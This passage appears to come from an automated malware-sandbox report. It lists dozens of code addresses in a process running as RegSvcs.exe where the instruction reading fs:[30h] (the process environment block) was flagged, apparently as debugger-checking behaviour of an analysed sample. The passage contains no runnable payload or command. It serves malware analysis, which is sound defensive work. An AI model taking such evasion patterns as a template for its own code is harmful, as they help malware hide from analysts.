                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105019F mov eax, dword ptr fs:[00000030h]10_2_0105019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD2050 mov eax, dword ptr fs:[00000030h]10_2_00FD2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010961C3 mov eax, dword ptr fs:[00000030h]10_2_010961C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010961C3 mov eax, dword ptr fs:[00000030h]10_2_010961C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E1D0 mov eax, dword ptr fs:[00000030h]10_2_0104E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E1D0 mov eax, dword ptr fs:[00000030h]10_2_0104E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E1D0 mov ecx, dword ptr fs:[00000030h]10_2_0104E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E1D0 mov eax, dword ptr fs:[00000030h]10_2_0104E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104E1D0 mov eax, dword ptr fs:[00000030h]10_2_0104E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCA020 mov eax, dword ptr fs:[00000030h]10_2_00FCA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCC020 mov eax, dword ptr fs:[00000030h]10_2_00FCC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE016 mov eax, dword ptr fs:[00000030h]10_2_00FEE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE016 mov eax, dword ptr fs:[00000030h]10_2_00FEE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE016 mov eax, dword ptr fs:[00000030h]10_2_00FEE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE016 mov eax, dword ptr fs:[00000030h]10_2_00FEE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A61E5 mov eax, dword ptr fs:[00000030h]10_2_010A61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010001F8 mov eax, dword ptr fs:[00000030h]10_2_010001F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01054000 mov ecx, dword ptr fs:[00000030h]10_2_01054000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01072000 mov eax, dword ptr fs:[00000030h]10_2_01072000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01072000 mov eax, dword ptr fs:[00000030h]10_2_01072000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01072000 mov eax, dword ptr fs:[00000030h]10_2_01072000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01072000 mov eax, dword ptr fs:[00000030h]10_2_01072000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01072000 mov eax, dword ptr fs:[00000030h]10_2_01072000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01072000 mov eax, dword ptr fs:[00000030h]10_2_01072000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01072000 mov eax, dword ptr fs:[00000030h]10_2_01072000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01072000 mov eax, dword ptr fs:[00000030h]10_2_01072000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01066030 mov eax, dword ptr fs:[00000030h]10_2_01066030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01056050 mov eax, dword ptr fs:[00000030h]10_2_01056050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCA197 mov eax, dword ptr fs:[00000030h]10_2_00FCA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCA197 mov eax, dword ptr fs:[00000030h]10_2_00FCA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCA197 mov eax, dword ptr fs:[00000030h]10_2_00FCA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD6154 mov eax, dword ptr fs:[00000030h]10_2_00FD6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD6154 mov eax, dword ptr fs:[00000030h]10_2_00FD6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCC156 mov eax, dword ptr fs:[00000030h]10_2_00FCC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010680A8 mov eax, dword ptr fs:[00000030h]10_2_010680A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010960B8 mov eax, dword ptr fs:[00000030h]10_2_010960B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010960B8 mov ecx, dword ptr fs:[00000030h]10_2_010960B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010520DE mov eax, dword ptr fs:[00000030h]10_2_010520DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010560E0 mov eax, dword ptr fs:[00000030h]10_2_010560E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010120F0 mov ecx, dword ptr fs:[00000030h]10_2_010120F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A30B mov eax, dword ptr fs:[00000030h]10_2_0100A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A30B mov eax, dword ptr fs:[00000030h]10_2_0100A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A30B mov eax, dword ptr fs:[00000030h]10_2_0100A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE02E1 mov eax, dword ptr fs:[00000030h]10_2_00FE02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE02E1 mov eax, dword ptr fs:[00000030h]10_2_00FE02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE02E1 mov eax, dword ptr fs:[00000030h]10_2_00FE02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]10_2_00FDA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]10_2_00FDA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]10_2_00FDA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]10_2_00FDA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]10_2_00FDA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01052349 mov eax, dword ptr fs:[00000030h]10_2_01052349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01078350 mov ecx, dword ptr fs:[00000030h]10_2_01078350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov eax, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov eax, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov eax, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov ecx, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov eax, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105035C mov eax, dword ptr fs:[00000030h]10_2_0105035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109A352 mov eax, dword ptr fs:[00000030h]10_2_0109A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE02A0 mov eax, dword ptr fs:[00000030h]10_2_00FE02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE02A0 mov eax, dword ptr fs:[00000030h]10_2_00FE02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107437C mov eax, dword ptr fs:[00000030h]10_2_0107437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC826B mov eax, dword ptr fs:[00000030h]10_2_00FC826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD4260 mov eax, dword ptr fs:[00000030h]10_2_00FD4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD4260 mov eax, dword ptr fs:[00000030h]10_2_00FD4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD4260 mov eax, dword ptr fs:[00000030h]10_2_00FD4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD6259 mov eax, dword ptr fs:[00000030h]10_2_00FD6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCA250 mov eax, dword ptr fs:[00000030h]10_2_00FCA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0108C3CD mov eax, dword ptr fs:[00000030h]10_2_0108C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010563C0 mov eax, dword ptr fs:[00000030h]10_2_010563C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC823B mov eax, dword ptr fs:[00000030h]10_2_00FC823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010743D4 mov eax, dword ptr fs:[00000030h]10_2_010743D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010743D4 mov eax, dword ptr fs:[00000030h]10_2_010743D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E3DB mov eax, dword ptr fs:[00000030h]10_2_0107E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E3DB mov eax, dword ptr fs:[00000030h]10_2_0107E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E3DB mov ecx, dword ptr fs:[00000030h]10_2_0107E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107E3DB mov eax, dword ptr fs:[00000030h]10_2_0107E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010063FF mov eax, dword ptr fs:[00000030h]10_2_010063FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]10_2_00FEE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]10_2_00FEE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]10_2_00FEE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE03E9 mov eax, dword ptr fs:[00000030h]10_2_00FE03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD83C0 mov eax, dword ptr fs:[00000030h]10_2_00FD83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD83C0 mov eax, dword ptr fs:[00000030h]10_2_00FD83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD83C0 mov eax, dword ptr fs:[00000030h]10_2_00FD83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD83C0 mov eax, dword ptr fs:[00000030h]10_2_00FD83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]10_2_00FDA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01058243 mov eax, dword ptr fs:[00000030h]10_2_01058243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01058243 mov ecx, dword ptr fs:[00000030h]10_2_01058243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC8397 mov eax, dword ptr fs:[00000030h]10_2_00FC8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC8397 mov eax, dword ptr fs:[00000030h]10_2_00FC8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC8397 mov eax, dword ptr fs:[00000030h]10_2_00FC8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF438F mov eax, dword ptr fs:[00000030h]10_2_00FF438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF438F mov eax, dword ptr fs:[00000030h]10_2_00FF438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE388 mov eax, dword ptr fs:[00000030h]10_2_00FCE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE388 mov eax, dword ptr fs:[00000030h]10_2_00FCE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE388 mov eax, dword ptr fs:[00000030h]10_2_00FCE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01080274 mov eax, dword ptr fs:[00000030h]10_2_01080274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E284 mov eax, dword ptr fs:[00000030h]10_2_0100E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E284 mov eax, dword ptr fs:[00000030h]10_2_0100E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01050283 mov eax, dword ptr fs:[00000030h]10_2_01050283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01050283 mov eax, dword ptr fs:[00000030h]10_2_01050283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01050283 mov eax, dword ptr fs:[00000030h]10_2_01050283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov eax, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov ecx, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov eax, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov eax, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov eax, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010662A0 mov eax, dword ptr fs:[00000030h]10_2_010662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCC310 mov ecx, dword ptr fs:[00000030h]10_2_00FCC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF0310 mov ecx, dword ptr fs:[00000030h]10_2_00FF0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01066500 mov eax, dword ptr fs:[00000030h]10_2_01066500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4500 mov eax, dword ptr fs:[00000030h]10_2_010A4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD04E5 mov ecx, dword ptr fs:[00000030h]10_2_00FD04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD64AB mov eax, dword ptr fs:[00000030h]10_2_00FD64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100656A mov eax, dword ptr fs:[00000030h]10_2_0100656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100656A mov eax, dword ptr fs:[00000030h]10_2_0100656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100656A mov eax, dword ptr fs:[00000030h]10_2_0100656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01004588 mov eax, dword ptr fs:[00000030h]10_2_01004588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFA470 mov eax, dword ptr fs:[00000030h]10_2_00FFA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFA470 mov eax, dword ptr fs:[00000030h]10_2_00FFA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFA470 mov eax, dword ptr fs:[00000030h]10_2_00FFA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E59C mov eax, dword ptr fs:[00000030h]10_2_0100E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC645D mov eax, dword ptr fs:[00000030h]10_2_00FC645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010505A7 mov eax, dword ptr fs:[00000030h]10_2_010505A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010505A7 mov eax, dword ptr fs:[00000030h]10_2_010505A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010505A7 mov eax, dword ptr fs:[00000030h]10_2_010505A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF245A mov eax, dword ptr fs:[00000030h]10_2_00FF245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E5CF mov eax, dword ptr fs:[00000030h]10_2_0100E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100E5CF mov eax, dword ptr fs:[00000030h]10_2_0100E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A5D0 mov eax, dword ptr fs:[00000030h]10_2_0100A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100A5D0 mov eax, dword ptr fs:[00000030h]10_2_0100A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCC427 mov eax, dword ptr fs:[00000030h]10_2_00FCC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCE420 mov eax, dword ptr fs:[00000030h]10_2_00FCE420
